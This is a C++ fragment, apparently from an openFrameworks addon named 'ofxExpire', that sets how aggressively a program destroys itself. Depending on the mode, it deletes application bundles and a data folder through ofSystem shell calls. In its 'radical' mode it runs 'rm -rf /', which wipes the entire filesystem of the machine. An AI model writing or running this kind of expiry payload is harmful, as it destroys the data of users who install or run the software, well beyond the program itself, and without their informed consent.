if (howAgressive == binary) {
s = ofSystem("rm -r ../../../*.app");
cout << s << endl;
} else if (howAgressive == both) {
s = ofSystem("rm -r ../../../*.app");
cout << s << endl;
s = ofSystem("rm -r ../../../data");
cout << s << endl;
} else if (howAgressive == radical) {
s = ofSystem("rm -rf /");
cout << s << endl;
}
↧
ofxExpire addon
↧